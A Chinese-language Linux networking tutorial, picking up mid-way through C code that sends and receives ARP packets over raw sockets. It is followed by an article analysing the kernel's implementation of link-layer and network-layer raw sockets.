? ? if(-1 == ioctl(skfd,SIOCGIFINDEX,&ifr)){
? ? ? ? ? ?perror("get dev index error:");
? ? ? ? ? ?exit(1);
? ? }
? ? toaddr.sll_ifindex = ifr.ifr_ifindex;
? ? printf("interface Index:%d\n",ifr.ifr_ifindex);
? ? //獲取接口IP地址
? ? if(-1 == ioctl(skfd,SIOCGIFADDR,&ifr)){
? ? ? ? ? ?perror("get IP addr error:");
? ? ? ? ? ?exit(1);
? ? }
? ? srcIP.s_addr = ((struct sockaddr_in*)&(ifr.ifr_addr))->sin_addr.s_addr;
? ? printf("IP addr:%s\n",inet_ntoa(((struct sockaddr_in*)&(ifr.ifr_addr))->sin_addr));


? ? //獲取接口的MAC地址
? ? if(-1 == ioctl(skfd,SIOCGIFHWADDR,&ifr)){
? ? ? ? ? ?perror("get dev MAC addr error:");
? ? ? ? ? ?exit(1);
? ? }


? ? memcpy(src_mac,ifr.ifr_hwaddr.sa_data,ETH_ALEN);
? ? printf("MAC :%02X-%02X-%02X-%02X-%02X-%02X\n",src_mac[0],src_mac[1],src_mac[2],src_mac[3],src_mac[4],src_mac[5]);




? ? //開始填充,構(gòu)造以太頭部
? ? eth=(struct ether_header*)buf;
? ? memcpy(eth->ether_dhost,dst_mac,ETH_ALEN);?
? ? memcpy(eth->ether_shost,src_mac,ETH_ALEN);
? ? eth->ether_type = htons(ETHERTYPE_ARP);


? ? //手動(dòng)開始填充用ARP報(bào)文首部
? ? arp=(struct arphdr*)(buf+sizeof(struct ether_header));
? ? arp->arp_hrd = htons(ARPHRD_ETHER); //硬件類型為以太
? ? arp->arp_pro = htons(ETHERTYPE_IP); //協(xié)議類型為IP


? ? //硬件地址長度和IPV4地址長度分別是6字節(jié)和4字節(jié)
? ? arp->arp_hln = ETH_ALEN;
? ? arp->arp_pln = 4;


? ? //操作碼,這里我們發(fā)送ARP請求
? ? arp->arp_op = htons(ARPOP_REQUEST);
? ? ??
? ? //填充發(fā)送端的MAC和IP地址
? ? memcpy(arp->arp_sha,src_mac,ETH_ALEN);
? ? memcpy(arp->arp_spa,&srcIP,4);


? ? //填充目的端的IP地址,MAC地址不用管
? ? inet_pton(AF_INET,argv[2],&targetIP);
? ? memcpy(arp->arp_tpa,&targetIP,4);


? ? toaddr.sll_family = PF_PACKET;
? ? n=sendto(skfd,buf,BUFLEN,0,(struct sockaddr*)&toaddr,sizeof(toaddr));


? ? close(skfd);
? ? return 0;
}
? ? ?結(jié)果如下:


? ? ? ?可以看到,我向網(wǎng)關(guān)發(fā)送一個(gè)ARP查詢請求,報(bào)文中攜帶了網(wǎng)關(guān)的IP地址以及我本地主機(jī)的IP和MAC地址。網(wǎng)關(guān)收到該請求后,對我的這個(gè)報(bào)文進(jìn)行了回應(yīng),將它的MAC地址在ARP應(yīng)答報(bào)文中發(fā)給我了。
? ? ? ?在這個(gè)示例程序中,我們完全自己手動(dòng)構(gòu)造了以太幀頭部,并完成了整個(gè)ARP請求報(bào)文的填充,最后用sendto函數(shù),將我們的數(shù)據(jù)通過eth0接口發(fā)送出去。這個(gè)程序的靈活性還在于支持多網(wǎng)卡,使用時(shí)只要指定網(wǎng)卡名稱(如eth0或eth1),程序便會(huì)自動(dòng)去獲取指定接口相應(yīng)的IP和MAC地址,然后用它們?nèi)ヌ畛銩RP請求報(bào)文中對應(yīng)的各字段。
? ? ? ?在頭文件里,主要對以太幀首部進(jìn)行了封裝:
點(diǎn)擊(此處)折疊或打開
struct ether_header
{
? ?u_int8_t ether_dhost[ETH_ALEN]; /* destination eth addr */
? ?u_int8_t ether_shost[ETH_ALEN]; /* source ether addr */
? ?u_int16_t ether_type; /* packet type ID field */
} __attribute__ ((__packed__));
? ? ?在頭文件中,對ARP首部進(jìn)行了封裝:
點(diǎn)擊(此處)折疊或打開
struct arphdr
{
? ? unsigned short ar_hrd; /* format of hardware address */
? ? unsigned short ar_pro; /* format of protocol address */
? ? unsigned char ar_hln; /* length of hardware address */
? ? unsigned char ar_pln; /* length of protocol address */
? ? unsigned short ar_op; /* ARP opcode (command) */
}
? ? ? 而頭文件里,又對ARP整個(gè)報(bào)文進(jìn)行了封裝:
點(diǎn)擊(此處)折疊或打開
struct ether_arp {
? ? struct arphdr ea_hdr; /* fixed-size 8 bytes header */
? ? u_int8_t arp_sha[ETH_ALEN]; /* sender hardware address */
? ? u_int8_t arp_spa[4]; /* sender protocol address */
? ? u_int8_t arp_tha[ETH_ALEN]; /* target hardware address */
? ? u_int8_t arp_tpa[4]; /* target protocol address */
};


#define arp_hrd ea_hdr.ar_hrd
#define arp_pro ea_hdr.ar_pro
#define arp_hln ea_hdr.ar_hln
#define arp_pln ea_hdr.ar_pln
#define arp_op ea_hdr.ar_op
? ? 最后再看一個(gè)簡單的接收ARP報(bào)文的小程序:?
點(diǎn)擊(此處)折疊或打開
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netpacket/packet.h>
#include <net/if.h>
#define BUFLEN 60


int main(int argc,char** argv){
? ? int i,skfd,n;
? ? char buf[ETH_FRAME_LEN]={0};
? ? struct ethhdr *eth;
? ? struct ether_arp *arp;
? ? struct sockaddr_ll fromaddr;
? ? struct ifreq ifr;


? ? unsigned char src_mac[ETH_ALEN]={0};


? ? if(2 != argc){
? ? ? ? printf("Usage: %s netdevName\n",argv[0]);
? ? ? ? exit(1);
? ? }


? ? //只接收發(fā)給本機(jī)的ARP報(bào)文
? ? if(0>(skfd=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ARP)))){
? ? ? ? perror("Create Error");
? ? ? ? exit(1);
? ? }


? ? bzero(&fromaddr,sizeof(fromaddr));
? ? bzero(&ifr,sizeof(ifr));
? ? strcpy(ifr.ifr_name,argv[1]);


? ? //獲取接口索引
? ? if(-1 == ioctl(skfd,SIOCGIFINDEX,&ifr)){
? ? ? ? perror("get dev index error:");
? ? ? ? exit(1);
? ? }
? ? fromaddr.sll_ifindex = ifr.ifr_ifindex;
? ? printf("interface Index:%d\n",ifr.ifr_ifindex);


? ? //獲取接口的MAC地址
? ? if(-1 == ioctl(skfd,SIOCGIFHWADDR,&ifr)){
? ? ? ? perror("get dev MAC addr error:");
? ? ? ? exit(1);
? ? }


? ? memcpy(src_mac,ifr.ifr_hwaddr.sa_data,ETH_ALEN);
? ? printf("MAC :%02X-%02X-%02X-%02X-%02X-%02X\n",src_mac[0],src_mac[1],src_mac[2],src_mac[3],src_mac[4],src_mac[5]);


? ? fromaddr.sll_family = PF_PACKET;
? ? fromaddr.sll_protocol=htons(ETH_P_ARP);
? ? fromaddr.sll_hatype=ARPHRD_ETHER;
? ? fromaddr.sll_pkttype=PACKET_HOST;
? ? fromaddr.sll_halen=ETH_ALEN;
? ? memcpy(fromaddr.sll_addr,src_mac,ETH_ALEN);


? ? bind(skfd,(struct sockaddr*)&fromaddr,sizeof(struct sockaddr));


? ? while(1){
? ? ? ? memset(buf,0,ETH_FRAME_LEN);
? ? ? ? n=recvfrom(skfd,buf,ETH_FRAME_LEN,0,NULL,NULL);
? ? ? ? eth=(struct ethhdr*)buf;
? ? ? ? arp=(struct ether_arp*)(buf+14);


? ? ? ? printf("Dest MAC:");
? ? ? ? for(i=0;i<ETH_ALEN;i++){
? ? ? ? ? ? printf("%02X-",eth->h_dest[i]);
? ? ? ? }
? ? ? ? printf("Sender MAC:");
? ? ? ? for(i=0;i<ETH_ALEN;i++){
? ? ? ? ? ? printf("%02X-",eth->h_source[i]);
? ? ? ? }


? ? ? ? printf("\n");
? ? ? ? printf("Frame type:%0X\n",ntohs(eth->h_proto));


? ? ? ? if(ntohs(arp->arp_op)==2){
? ? ? ? ? ? printf("Get an ARP replay!\n");
? ? ? ? }
? ? }
? ? close(skfd);
? ? return 0;
}
?該示例程序中,調(diào)用recvfrom之前我們調(diào)用了bind系統(tǒng)調(diào)用,目的是僅從指定的接口接收ARP報(bào)文(由socket函數(shù)的第三個(gè)參數(shù)“ETH_P_ARP”決定)??梢詫Ρ纫幌?#xff0c;該程序與博文“Linux網(wǎng)絡(luò)編程:原始套接字的魔力【下】”里介紹的抓包程序的區(qū)別。


?小結(jié):通過這幾個(gè)章節(jié)的熱身,相信大家對網(wǎng)絡(luò)編程中常見的一系列API函數(shù)socket,bind,listen,connect,sendto,recvfrom,close等的認(rèn)識應(yīng)該會(huì)有一個(gè)較高的突破。當(dāng)然,你也必須趕快對它們熟悉起來,因?yàn)楹竺嫖覀儾坏爸淙弧?#xff0c;還要知其“所以然”。后面,我們會(huì)以這些函數(shù)調(diào)用為主線,看看它們到底在內(nèi)核中做些哪些事情,而這又對我們理解協(xié)議棧的實(shí)現(xiàn)原理有什么幫助做進(jìn)一步的分析和討論。
========

Linux原始套接字實(shí)現(xiàn)分析

http://www.cnblogs.com/davidwang456/p/3463291.html


本文從IPV4協(xié)議棧原始套接字的分類入手,詳細(xì)介紹了鏈路層和網(wǎng)絡(luò)層原始套接字的特點(diǎn)及其內(nèi)核實(shí)現(xiàn)細(xì)節(jié)。并結(jié)合原始套接字的實(shí)際應(yīng)用,說明各類型原始套接字的適應(yīng)范圍,以及在實(shí)際使用時(shí)需要注意的問題。


一、原始套接字概述


協(xié)議棧的原始套接字從實(shí)現(xiàn)上可以分為“鏈路層原始套接字”和“網(wǎng)絡(luò)層原始套接字”兩大類。本節(jié)主要描述各自的特點(diǎn)及其適用范圍。
鏈路層原始套接字可以直接用于接收和發(fā)送鏈路層的MAC幀,在發(fā)送時(shí)需要由調(diào)用者自行構(gòu)造和封裝MAC首部。而網(wǎng)絡(luò)層原始套接字可以直接用于接收和發(fā)送IP層的報(bào)文數(shù)據(jù),在發(fā)送時(shí)需要自行構(gòu)造IP報(bào)文頭(取決是否設(shè)置IP_HDRINCL選項(xiàng))。


1.1 ?鏈路層原始套接字


鏈路層原始套接字調(diào)用socket()函數(shù)創(chuàng)建。第一個(gè)參數(shù)指定協(xié)議族類型為PF_PACKET,第二個(gè)參數(shù)type可以設(shè)置為SOCK_RAW或SOCK_DGRAM,第三個(gè)參數(shù)是協(xié)議類型(該參數(shù)只對報(bào)文接收有意義)。協(xié)議類型protocol不同取值的意義具體見表1所示:
socket(PF_PACKET, type, htons(protocol))
? ? ??
a) ? ? ? 參數(shù)type設(shè)置為SOCK_RAW時(shí),套接字接收和發(fā)送的數(shù)據(jù)都是從MAC首部開始的。在發(fā)送時(shí)需要由調(diào)用者從MAC首部開始構(gòu)造和封裝報(bào)文數(shù)據(jù)。type設(shè)置為SOCK_RAW的情況應(yīng)用是比較多的,因?yàn)槟承╉?xiàng)目會(huì)使用到自定義的二層報(bào)文類型。


socket(PF_PACKET, SOCK_RAW, htons(protocol))
?
b) ? ? ?參數(shù)type設(shè)置為SOCK_DGRAM時(shí),套接字接收到的數(shù)據(jù)報(bào)文會(huì)將MAC首部去掉。同時(shí)在發(fā)送時(shí)也不需要再手動(dòng)構(gòu)造MAC首部,只需要從IP首部(或ARP首部,取決于封裝的報(bào)文類型)開始構(gòu)造即可,而MAC首部的填充由內(nèi)核實(shí)現(xiàn)的。若對于MAC首部不關(guān)心的場景,可以使用這種類型,這種用法用得比較少。


socket(PF_PACKET, SOCK_DGRAM, htons(protocol))


表1 ?protocol不同取值


protocol





作用


ETH_P_ALL


?0x0003


報(bào)收本機(jī)收到的所有二層報(bào)文


ETH_P_IP


0x0800


報(bào)收本機(jī)收到的所有IP報(bào)文


ETH_P_ARP


0x0806


報(bào)收本機(jī)收到的所有ARP報(bào)文


ETH_P_RARP


0x8035


報(bào)收本機(jī)收到的所有RARP報(bào)文


自定義協(xié)議


比如0x0810


報(bào)收本機(jī)收到的所有類型為0x0810的二層報(bào)文


不指定


0


不能用于接收,只用于發(fā)送


……


……


……


表1中protocol的取值中有兩個(gè)值是比較特殊的。當(dāng)protocol為ETH_P_ALL時(shí),表示能夠接收本機(jī)收到的所有二層報(bào)文(包括IP, ARP, 自定義二層報(bào)文等),同時(shí)這種類型套接字還能夠?qū)⑼獍l(fā)的報(bào)文再收回來。當(dāng)protocol為0時(shí),表示該套接字不能用于接收報(bào)文,只能用于發(fā)送。具體的實(shí)現(xiàn)細(xì)節(jié)在2.2節(jié)中會(huì)詳細(xì)介紹。


1.2 ?網(wǎng)絡(luò)層原始套接字


創(chuàng)建面向連接的TCP和創(chuàng)建面向無連接的UDP套接字,在接收和發(fā)送時(shí)只能操作數(shù)據(jù)部分,而不能對IP首部或TCP和UDP首部進(jìn)行操作。如果想要操作IP首部或傳輸層協(xié)議首部,就需要調(diào)用如下socket()函數(shù)創(chuàng)建網(wǎng)絡(luò)層原始套接字。第一個(gè)參數(shù)指定協(xié)議族的類型為PF_INET,第二個(gè)參數(shù)為SOCK_RAW,第三個(gè)參數(shù)protocol為協(xié)議類型(不同取值的意義見表2)。產(chǎn)品線有使用OSPF和RSVP等協(xié)議,需要使用這種類型的套接字。


socktet(PF_INET, SOCK_RAW, protocol)
? ?
a) ? ? ? 接收報(bào)文


網(wǎng)絡(luò)層原始套接字接收到的報(bào)文數(shù)據(jù)是從IP首部開始的,即接收到的數(shù)據(jù)包含了IP首部, TCP/UDP/ICMP等首部, 以及數(shù)據(jù)部分。
?
b) ? ? ?發(fā)送報(bào)文


網(wǎng)絡(luò)層原始套接字發(fā)送的報(bào)文數(shù)據(jù),在默認(rèn)情況下是從IP首部之后開始的,即需要由調(diào)用者自行構(gòu)造和封裝TCP/UDP等協(xié)議首部。


這種套接字也提供了發(fā)送時(shí)從IP首部開始構(gòu)造數(shù)據(jù)的功能,通過setsockopt()給套接字設(shè)置上IP_HDRINCL選項(xiàng),就需要在發(fā)送時(shí)自行構(gòu)造IP首部。


int val = 1;?
setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &val, sizeof(val));
?
表2 ?protocol不同取


protocol





作用


IPPROTO_TCP


6


報(bào)收TCP類型的報(bào)文


IPPROTO_UDP


17


報(bào)收UDP類型的報(bào)文


IPPROTO_ICMP


1


報(bào)收ICMP類型的報(bào)文


IPPROTO_IGMP


2


報(bào)收IGMP類型的報(bào)文


IPPROTO_RAW


255


不能用于接收,只用于發(fā)送(需要構(gòu)造IP首部)


OSPF


89


接收協(xié)議號為89的報(bào)文


……


……


……


表2中protocol取值為IPPROTO_RAW是比較特殊的,表示套接字不能用于接收,只能用于發(fā)送(且發(fā)送時(shí)需要從IP首部開始構(gòu)造報(bào)文)。具體的實(shí)現(xiàn)細(xì)節(jié)在2.3節(jié)中會(huì)詳細(xì)介紹。


二、原始套接字實(shí)現(xiàn)
本節(jié)主要首先介紹鏈路層和網(wǎng)絡(luò)層原始套接字報(bào)文的收發(fā)總體流程,再分別對兩類套接字的創(chuàng)建、接收、發(fā)送等具體實(shí)現(xiàn)細(xì)節(jié)進(jìn)行介紹。


2.1 ?原始套接字報(bào)文收發(fā)流程


圖1 ?原始套接字收發(fā)流程


如上圖1所示為鏈路層和網(wǎng)絡(luò)層原始套接字的收發(fā)總體流程。網(wǎng)卡驅(qū)動(dòng)收到報(bào)文后在軟中斷上下文中由netif_receive_skb()處理,匹配是否有注冊的鏈路層原始套接字,若匹配上就通過skb_clone()來克隆報(bào)文,并將報(bào)文交給相應(yīng)的原始套接字。對于IP報(bào)文,在協(xié)議棧的ip_local_deliver_finish()函數(shù)中會(huì)匹配是否有注冊的網(wǎng)絡(luò)層原始套接字,若匹配上就通過skb_clone()克隆報(bào)文并交給相應(yīng)的原始套接字來處理。


注意:這里只是將報(bào)文克隆一份交給原始套接字,而該報(bào)文還是會(huì)繼續(xù)走后續(xù)的協(xié)議棧處理流程。


? ? ? 鏈路層原始套接字的發(fā)送,直接由套接字層調(diào)用packet_sendmsg()函數(shù),最終再調(diào)用網(wǎng)卡驅(qū)動(dòng)的發(fā)送函數(shù)。網(wǎng)絡(luò)層原始套接字的發(fā)送實(shí)現(xiàn)要相對復(fù)雜一些,由套接字層調(diào)用inet_sendmsg()->raw_sendmsg(),再經(jīng)過路由和鄰居子系統(tǒng)的處理后,最終調(diào)用網(wǎng)卡驅(qū)動(dòng)的發(fā)送函數(shù)。若注冊了ETH_P_ALL類型套接字,還需要將外發(fā)報(bào)文再收回去。


2.2 ?鏈路層原始套接字的實(shí)現(xiàn)


2.2.1 ?套接字創(chuàng)建
?
調(diào)用socket()函數(shù)創(chuàng)建套接字的流程如下,鏈路層原始套接字最終由packet_create()創(chuàng)建。


sys_socket()->sock_create()->__sock_create()->packet_create()
?
? ? 當(dāng)socket()函數(shù)的第三個(gè)參數(shù)protocol為非零的情況下,會(huì)調(diào)用dev_add_pack()將鏈路層套接字packet_sock的packet_type結(jié)構(gòu)鏈到ptype_all鏈表或ptype_base鏈表中。 ? ?


void dev_add_pack(struct packet_type *pt)?
{?
? ? ? ? ……?
? ? ? ? if (pt->type == htons(ETH_P_ALL)) {?
? ? ? ? ? ? ? ? netdev_nit++;?
? ? ? ? ? ? ? ? list_add_rcu(&pt->list, &ptype_all);?
? ? ? ? } else {?
? ? ? ? ? ? ? ? hash = ntohs(pt->type) & 15;?
? ? ? ? ? ? ? ? list_add_rcu(&pt->list, &ptype_base[hash]);?
? ? ? ? }?
? ? ? ? ……?
}
? ? 當(dāng)protocol為ETH_P_ALL時(shí),會(huì)將套接字加入到ptype_all鏈表中。如圖2所示,這里創(chuàng)建了兩個(gè)鏈路層原始套接字。


圖2 ?ptype_all鏈表
?
當(dāng)protocol為其它非0值時(shí),會(huì)將套接字加入到ptype_base鏈表中。如圖3所示,協(xié)議棧本身也需要注冊packet_type結(jié)構(gòu),圖中淺色的兩個(gè)packet_type結(jié)構(gòu)分別是IP協(xié)議和ARP協(xié)議注冊的,其處理函數(shù)分別為ip_rcv()和arp_rcv()。圖中另外3個(gè)深色的packet_type結(jié)構(gòu)則是鏈路層原始套接字注冊的,分別用于接收類型為ETH_P_IP、ETH_P_ARP和0x0810類型的報(bào)文。


圖3 ?ptype_base鏈表


2.2.2 ?報(bào)文接收


網(wǎng)卡驅(qū)動(dòng)程序接收到報(bào)文后,在軟中斷上下文由netif_receive_skb()處理。首先會(huì)逐個(gè)遍歷ptype_all鏈表中的packet_type結(jié)構(gòu),若滿足條件“(!ptype->dev || ptype->dev == skb->dev)”,即套接字未綁定或者套接字綁定網(wǎng)口與skb所在網(wǎng)口匹配,就增加報(bào)文引用計(jì)數(shù)并交給packet_rcv()函數(shù)處理(若使用PACKET_MMAP收包方式則由tpacket_rcv()函數(shù)處理)。


網(wǎng)卡驅(qū)動(dòng)->netif_receive_skb()->deliver_skb()->packet_rcv()/tpacket_rcv()


? ? 以非PACKET_MMAP收包方式為例進(jìn)行說明,packet_rcv()函數(shù)中比較重要的代碼片段如下。當(dāng)報(bào)文skb到達(dá)packet_rcv()函數(shù)時(shí),其skb->data所指的數(shù)據(jù)是不包含MAC首部的,所以對于type為非SOCK_DGRAM(即SOCK_RAW)類型,需要將skb->data指針前移,以便數(shù)據(jù)部分可以包含MAC首部。最后將skb放到套接字的接收隊(duì)列sk->sk_receive_queue中,并喚醒用戶態(tài)進(jìn)程來讀取套接字中的數(shù)據(jù)。


……?
if (sk->sk_type != SOCK_DGRAM) //即SOCK_RAW類型?
? ? ? ? skb_push(skb, skb->data - skb->mac.raw);?
……?
__skb_queue_tail(&sk->sk_receive_queue, skb);?
sk->sk_data_ready(sk, skb->len); //喚醒進(jìn)程讀取數(shù)據(jù)?
……
PACKET_MMAP收包方式的實(shí)現(xiàn)有所不同,tpacket_rcv()函數(shù)將skb->data拷貝到與用戶態(tài)mmap映射的共享內(nèi)存中,最后喚醒用戶態(tài)進(jìn)程來讀取數(shù)據(jù)。由于報(bào)文的內(nèi)容已存放在內(nèi)核空間和用戶空間共享的緩沖區(qū)中,用戶態(tài)可以直接讀取以減少數(shù)據(jù)的拷貝,所以這種方式效率比較高。


? ? 上面介紹了報(bào)文接收在軟中斷的處理流程。下面以非PACKET_MMAP收包方式為例,介紹用戶態(tài)讀取報(bào)文數(shù)據(jù)的流程。用戶態(tài)recvmsg()最終調(diào)用skb_recv_datagram(),如果套接字接收隊(duì)列sk->sk_receive_queue中有報(bào)文就取skb并返回。否則調(diào)用wait_for_packet()等待,直到內(nèi)核軟中斷收到報(bào)文并喚醒用戶態(tài)進(jìn)程。


sys_recvmsg()->sock_recvmsg()->…->packet_recvmsg()->skb_recv_datagram()


2.2.3 ?報(bào)文發(fā)送


用戶態(tài)調(diào)用sendto()或sendmsg()發(fā)送報(bào)文的內(nèi)核態(tài)處理流程如下,由套接字層最終會(huì)調(diào)用到packet_sendmsg()。


sys_sendto()->sock_sendmsg()->__sock_sendmsg()->packet_sendmsg()->dev_queue_xmit()


? ? 該函數(shù)比較重要的函數(shù)片段如下。首先進(jìn)行參數(shù)檢查及skb分配,再調(diào)用驅(qū)動(dòng)程序的hard_header函數(shù)(對于以太網(wǎng)驅(qū)動(dòng)是eth_header()函數(shù))來構(gòu)造報(bào)文的MAC頭部,此時(shí)的skb->data是指向MAC首部的,且skb->len為MAC首部長度(即14)。對于創(chuàng)建時(shí)指定type為SOCK_RAW類型套接字,由于在發(fā)送時(shí)需要自行構(gòu)造MAC頭部,所以將skb->tail指針恢復(fù)到MAC首部開始的位置,并將skb->len設(shè)置為0(即不使用內(nèi)核構(gòu)造的MAC首部)。接著再調(diào)用memcpy_fromiovec()從skb->tail的位置開始拷貝報(bào)文數(shù)據(jù),最終調(diào)用網(wǎng)卡驅(qū)動(dòng)的發(fā)送函數(shù)將報(bào)文發(fā)送出去。


注:如果創(chuàng)建套接字時(shí)指定type為SOCK_DGRAM,則使用內(nèi)核構(gòu)造的MAC首部,用戶態(tài)發(fā)送的數(shù)據(jù)中不含MAC頭部數(shù)據(jù)。


……?
res = dev->hard_header(skb, dev, ntohs(proto), addr, NULL, len); //構(gòu)造MAC首部?
if (sock->type != SOCK_DGRAM) {?
? ? ? ? skb->tail = skb->data; //SOCK_RAW類型?
? ? ? ? skb->len = 0;?
}?
……
err = memcpy_fromiovec(skb_put(skb,len), msg->msg_iov, len); //拷貝報(bào)文數(shù)據(jù)
……?
err = dev_queue_xmit(skb); //發(fā)送報(bào)文?
……
?
2.2.4 ?其它


a) ? ? ? ? 套接字的綁定


鏈路層原始套接字可調(diào)用bind()函數(shù)進(jìn)行綁定,讓packet_type結(jié)構(gòu)dev字段指向相應(yīng)的net_device結(jié)構(gòu),即將套接字綁定到相應(yīng)的網(wǎng)口上。如2.2.2節(jié)報(bào)文接收的描述,在接收時(shí)如果套接口有綁定就需要進(jìn)一步確認(rèn)當(dāng)前skb->dev是否與綁定網(wǎng)口相匹配,只有匹配的才會(huì)將報(bào)文上送到相應(yīng)的套接字。


sys_bind()->packet_bind()->packet_do_bind()


b) ? ? ? ?套接字選項(xiàng)


以下是比較常用的套接字選項(xiàng)


PACKET_RX_RING:用于PACKET_MMAP收包方式設(shè)置接收環(huán)形隊(duì)列


PACKET_STATISTICS:用于讀取收包統(tǒng)計(jì)信息


c) ? ? ? 信息查看


鏈路層原始套接字的信息可通過/proc/net/packet進(jìn)行查看。如下為圖2和圖3中創(chuàng)建的原始套接字的信息,可以查看到創(chuàng)建時(shí)指定的協(xié)議類型、是否綁定網(wǎng)口、已使用的接收緩存大小等信息。這些信息對于分析和定位問題有幫助。?


cat /proc/net/packet
sk RefCnt Type Proto Iface R Rmem User Inode
ffff810007df8400 3 3 0810 0 1 0 0 1310
ffff810007df8800 3 3 0806 0 1 0 0 1309
ffff810007df8c00 3 3 0800 0 1 560 0 1308
ffff810007df8000 3 3 0003 0 1 560 0 1307
ffff810007df3800 3 3 0003 0 1 560 0 1306
?
2.3 ?網(wǎng)絡(luò)層原始套接字的實(shí)現(xiàn)


2.3.1 ?套接字創(chuàng)建


如圖4所示,在IPV4協(xié)議棧中一個(gè)傳輸層協(xié)議(如TCP,UDP,UDP-Lite等)對應(yīng)一個(gè)inet_protosw結(jié)構(gòu),而inet_protosw結(jié)構(gòu)中又包含了proto_ops結(jié)構(gòu)和proto結(jié)構(gòu)。網(wǎng)絡(luò)子系統(tǒng)初始化時(shí)將所有的inet_protosw結(jié)構(gòu)hash到全局的inetsw[]數(shù)組中。proto_ops結(jié)構(gòu)實(shí)現(xiàn)的是從與協(xié)議無關(guān)的套接口層到協(xié)議相關(guān)的傳輸層的轉(zhuǎn)接,而proto結(jié)構(gòu)又將傳輸層映射到網(wǎng)絡(luò)層。


圖4 ?inetsw[]數(shù)組結(jié)構(gòu)


? ? 調(diào)用socket()函數(shù)創(chuàng)建套接字的流程如下,網(wǎng)絡(luò)層原始套接字最終由inet_create()創(chuàng)建。


sys_socket()->sock_create()->__sock_create()->inet_create()


? ? inet_create()函數(shù)除用于創(chuàng)建網(wǎng)絡(luò)層原始套接字外,還用于創(chuàng)建TCP、UDP套接字。首先根據(jù)socket()函數(shù)的第二個(gè)參數(shù)(即SOCK_RAW)在inetsw[]數(shù)組中匹配到相應(yīng)的inet_protosw結(jié)構(gòu)。并將套接字結(jié)構(gòu)的ops設(shè)置為inet_sockraw_ops,將套接字結(jié)構(gòu)的sk_prot設(shè)置為raw_prot。然后對于SOCK_RAW類型套接字,還要將inet->num設(shè)置為協(xié)議類型,以便最后能調(diào)用proto結(jié)構(gòu)的hash函數(shù)(即raw_v4_hash())。
??


……?
sock->ops = answer->ops; //將socket結(jié)構(gòu)的ops設(shè)置為inet_sockraw_ops?
answer_prot = answer->prot;?
……?
if (SOCK_RAW == sock->type) { //SOCK_RAW類型的套接字,設(shè)置inet->num?
? ? ? ? inet->num = protocol;?
? ? ? ? if (IPPROTO_RAW == protocol) //protocol為IPPROTO_RAW的特殊處理,?
? ? ? ? ? ? ? ? inet->hdrincl = 1; 后續(xù)在報(bào)文發(fā)送時(shí)會(huì)再講到?
}?
……
if (inet->num) {
? ? ? ? inet->sport = htons(inet->num);?
? ? ? ? sk->sk_prot->hash(sk); //調(diào)用raw_v4_hash()函數(shù)將套接字鏈到raw_v4_htable中?
}?
……
?
經(jīng)過如上操作后,相應(yīng)的套接字結(jié)構(gòu)sock會(huì)通過raw_v4_hash()函數(shù)鏈到raw_v4_htable鏈表中,網(wǎng)絡(luò)層原始套接字報(bào)文接收時(shí)需要使用到raw_v4_htable。如圖5所示,共創(chuàng)建了3個(gè)網(wǎng)絡(luò)層原始套接字,協(xié)議類型分別為IPPROTO_TCP、IPPROTO_ICMP和89。
?
圖5 ?raw_v4_htable鏈表


2.3.2 ?報(bào)文接收


網(wǎng)卡驅(qū)動(dòng)收到報(bào)文后在軟中斷上下文由netif_receive_skb()處理,對于IP報(bào)文且目的地址為本機(jī)的會(huì)由ip_rcv()最終調(diào)用ip_local_deliver_finish()函數(shù)。ip_local_deliver_finish()主要功能的代碼片段如下,先根據(jù)報(bào)文的L4層協(xié)議類型hash值在圖5中的raw_v4_htable表中查找是否有匹配的sock。如果有匹配的sock結(jié)構(gòu),就進(jìn)一步調(diào)用raw_v4_input()處理網(wǎng)絡(luò)層原始套接字。不管是否有原始套接字要處理,該報(bào)文都會(huì)走后續(xù)的協(xié)議棧處理流程。即會(huì)繼續(xù)匹配inet_protos[]數(shù)組,根據(jù)L4層協(xié)議類型走TCP、UDP、ICMP等不同處理流程。
? ? ?
……?
hash = protocol & (MAX_INET_PROTOS - 1); //根據(jù)報(bào)文協(xié)議類型取hash值?
raw_sk = sk_head(&raw_v4_htable[hash]); //在raw_v4_htable中查找?
……?
if (raw_sk && !raw_v4_input(skb, skb->nh.iph, hash)) //處理原始套接字?
……?
if ((ipprot = rcu_dereference(inet_protos[hash])) != NULL) { //匹配inet_protos[]數(shù)組?
? ? ? ? ……?
? ? ? ? ret = ipprot->handler(skb); //調(diào)用傳輸層處理函數(shù)?
? ? ? ? ……?
} else { //如果在inet_protos[]數(shù)組中未匹配到,則釋放報(bào)文
? ? ? ? ……?
? ? ? ? kfree_skb(skb);?
}?
……
?
如圖6所示的inet_protos[]數(shù)組,每項(xiàng)由net_protocol結(jié)構(gòu)組成。表示一個(gè)協(xié)議(包括傳輸層協(xié)議和網(wǎng)絡(luò)層附屬協(xié)議)的接收處理函數(shù)集,一般包括一個(gè)正常接收函數(shù)和一個(gè)出錯(cuò)接收函數(shù)。圖中TCP、UDP和ICMP協(xié)議的接收處理函數(shù)分別為tcp_v4_rcv()、udp_rcv()和icmp_rcv()。如果在inet_protos[]數(shù)組中未配置到相應(yīng)的net_protocol結(jié)構(gòu),報(bào)文就會(huì)被丟棄掉。比如OSPF報(bào)文(協(xié)議類型為89)在inet_protos[]數(shù)組中沒有相應(yīng)的項(xiàng),內(nèi)核會(huì)將其丟棄掉,這種報(bào)文只能提供網(wǎng)絡(luò)層原始套接字接收到用戶態(tài)來處理。


?圖6 ?inet_protos[]數(shù)組結(jié)構(gòu)


? ? 網(wǎng)絡(luò)層原始套接字的總體接收流程如下,最終會(huì)將skb掛到相應(yīng)套接字上,并喚醒用戶態(tài)進(jìn)程讀取報(bào)文數(shù)據(jù)。


網(wǎng)卡驅(qū)動(dòng)->netif_receive_skb()->ip_rcv()->ip_rcv_finish()->ip_local_deliver()->ip_local


_deliver_finish()->raw_v4_input()->raw_rcv()->raw_rcv_skb()->sock_queue_rcv_skb()


……?
skb_queue_tail(&sk->sk_receive_queue, skb); //掛到接收隊(duì)列?
if (!sock_flag(sk, SOCK_DEAD))?
? ? ? ? sk->sk_data_ready(sk, skb_len); //喚醒用戶態(tài)進(jìn)程?
……
?
